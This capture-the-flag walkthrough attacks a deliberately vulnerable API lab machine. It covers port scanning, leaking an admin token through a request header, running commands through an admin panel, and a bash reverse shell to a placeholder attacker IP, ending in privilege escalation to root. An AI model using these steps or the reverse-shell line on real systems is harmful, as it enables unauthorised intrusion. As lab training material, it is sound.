Vulnerable API App

Target Details

• Target IP: 10.10.149.135

Service Discovery

• Scan Open ports using nmap

  $ sudo nmap -sS -sV -sC -Pn -A -oN nmap.txt 10.10.149.135
  Nmap scan report for 10.10.149.135
  Host is up (0.45s latency).
  Not shown: 997 closed tcp ports (reset)
  PORT     STATE SERVICE VERSION
  22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
  | ssh-hostkey:
  |   3072 86:65:28:5a:90:b3:1f:8e:9c:0b:62:3a:71:4b:97:37 (RSA)
  |   256 87:37:9b:9d:fc:c4:dd:bc:21:0c:d9:a2:ab:96:90:be (ECDSA)
  |_  256 a2:fd:4a:10:db:5b:ce:3d:c2:2c:c0:0c:8f:be:6c:41 (ED25519)
  80/tcp   open  http    nginx 1.18.0 (Ubuntu)
  |_http-title: Welcome to nginx!
  |_http-server-header: nginx/1.18.0 (Ubuntu)
  5000/tcp open  upnp?
  | fingerprint-strings:
  |   GenericLines:
  |     HTTP/1.1 400 Bad Request
  ...
  
  ...
  Network Distance: 4 hops
  Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  
  TRACEROUTE (using port 143/tcp)
  HOP RTT       ADDRESS
  1   354.40 ms 10.2.0.1
  2   ... 3
  4   447.88 ms 10.10.149.135
  
  OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

• Services Found:

Service	Port	Version
SSH	22	OpenSSH 8.2p1
nginx HTTP	80	/1.18.0
Web Service	5000	Unknown

• Answer the Task questions

Content Discovery

• Visit the web application in browser

• Common endpoints are /api or api.domain.com,

  /api worked!

• We can find other endpoints by manually by crawling through the web application with burpsuite proxy running

• On inspecting the html, the admin has left a message in webpage comment for the hacker!

  <!--     
  This is a normal login page, I've always been smarter than you, I've only created sign up action to `users` using API!
  If you want access, Hack the way in by finding endpoint and signing up or find flaw in the endpoint!
  
  - vuln admin
  -->

  from comment we can make conclusion that, we cannot directly sign up from the login page, we need to find api endpoint to sign up. admin has also provided hint to the endpoint for users sign up

• On visiting /api/users endpoint, we get json response, providing information about other users!!

  {
    "users": [
      {
        "userid": 1,
        "first_name": "Martin",
        "last_name": "Rodriguez",
        "admin": false
      },
      {
        "userid": 2,
        "first_name": "Kristen",
        "last_name": "Martin",
        "admin": false
      },
      ....
      {
        "userid": 27,
        "first_name": "Derek",
        "last_name": "Washington",
        "admin": true
      }
    ]
  }

  We got user details names, user Id and their role while using the application

• In most of the cases, endpoint supports various http methods, let's verify it using OPTIONS method. Let's visit the same users enpoint and send the request to repeater this time, and change HTTP method from GET to POST

  GET /api/users HTTP/1.1
  
  # change to
  OPTIONS /api/users HTTP/1.1

• On visiting dmdhrumilmistry GitHub Profile repos, Vulnerable-API-App app.py file, we can retrieve all the endpoints from the file. The useful ones for now are listed below.

• Endpoints Discovered using burpsuite

Endpoint	HTTP Methods Allowed
/api/users/	DELETE, HEAD, OPTIONS, GET
/api/users	POST, OPTIONS, HEAD, GET

Exploit Endpoints

• from /api/user/<userid:int> endpoint we can get user details, from /api/users endpoint we can retrieve admin user id and try to get their account details. For my case admin id is 27.

  admin id will vary

• Send Burp Request to /api/user/27, we'll receive json response as

  {
    "admin": true,
    "first_name": "Derek",
    "last_name": "Washington",
    "userid": 27
  }

• Using first question hint, we know that we need to send Hide-Info header in the HTTP request.

  • Burp Request

  GET /api/user/27 HTTP/1.1
  Hide-Info: 0

  • Burp Json Response

  {
    "admin": true,
    "email": "admin@vuln-api-app.com",
    "first_name": "Derek",
    "last_name": "Washington",
    "token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTY1NzcwODY4OSwianRpIjoiYjBhNzdmODgtZjcyMS00ZjhkLTgyOGUtYWRlNzIwZjI3ODcwIiwidHlwZSI6ImFjY2VzcyIsInN1YiI6ImFkbWluQHZ1bG4tYXBpLWFwcC5jb20iLCJuYmYiOjE2NTc3MDg2ODl9.94MZ1fRrRrIdt_FFnLQdjGMWHbvA5_cSnwYfiaVl0Jw",
    "userid": 27
  }

  Now we've received token

• We can add token in BurpSuite every request using Custom Header Extension, Refer docs for installation and usage, then add authorization token to extension.

• Now, Add http://10.10.149.135:5000, and capture in scope requests only.

• configure Custom Header extension to add header while using proxy using

  • Project Options

  • Sessions

  • From Session Handling rules click on add button

  • provide description

  • Click on Add button from Rule Actions

  • Choose Invoke Burp Extension

  • Set extension handler to Add Custom Header

  • Click on OK

  • From Scope tab, click on Proxy checkbox to add headers while using proxy. Also set URL scope to set Suite Scope

  • Click on OK

• Visit HomePage http://10.10.149.135:5000

Get Target Machine Shell

• Visit HomePage, with login admin auth token

• From HomePage, visit Admin Controls tab, from where we can run bash commands

• Using GTFObins Bash Reverse Shell get access to reverse shell

• Start Netcat on attacker's machine

  nc -nlvp 4444

• Enter below command in command input field

  bash -c 'exec bash -i &>/dev/tcp/ATTACKER_THM_IP/4444 <&1'

• On Execution of command, we get a reverse shell on the attacker machine

  $ nc -nlvp 4444
  listening on [any] 4444 ...
  connect to [ATTACKER_THM_IP] from (UNKNOWN) [10.10.226.214] 33472
  bash: cannot set terminal process group (610): Inappropriate ioctl for device
  bash: no job control in this shell
  vulnadmin@vulnapiapp:~/deployment/apps/Vulnerable-API-app$

Get User Flag

• Read User Flag

  vulnadmin@vulnapiapp:~/deployment/apps/Vulnerable-API-app$ cat $HOME/user.txt
  THM{REDACTED}

Privilege Escalation

• Checking if vulnadmin has sudo permissions

  vulnadmin@vulnapiapp:~$ groups
  sudo adm cdrom dip plugdev lxd

  vulnadmin has sudo permission, but first we need to find its password to run sudo command

• On Listing Files in vulnadmin home directory, we find a backup.txt file

  vulnadmin@vulnapiapp:~$ ls -l
  total 12
  -rw-rw-r-- 1 vulnadmin vulnadmin   45 Jul 12 14:58 backup.txt
  drwxrwxr-x 3 vulnadmin vulnadmin 4096 Jul 12 11:27 deployment
  -rw-rw-r-- 1 vulnadmin vulnadmin   30 Jul 12 13:21 user.txt

• On Reading file, it seems to be encoded in base64 format

• Decode backup.txt file

  vulnadmin@vulnapiapp:~$ cat backup.txt | base64 -d
  {REDACTED}

  It's password for vulnadmin account

• To run sudo command we need to spawn terminal first, since the deployed application is running flask which is a python framework, python must be installed which can be verified using

  vulnadmin@vulnapiapp:~$ python3 --version
  Python 3.8.10

• Get Interactive Shell

  vulnadmin@vulnapiapp:~$ python3 -c 'import pty;pty.spawn("/bin/bash")'

• List commands which can be run as with root privileges by vulnadmin

  vulnadmin@vulnapiapp:~$ sudo su
  [sudo] password for vulnadmin: {REDACTED}
  root@vulnapiapp:/home/vulnadmin/#

• Get Root Flag

  root@vulnapiapp:~# cat /root/root.txt
  cat /root/root.txt
  THM{REDACTED}

• We've successfully Rooted the machine!!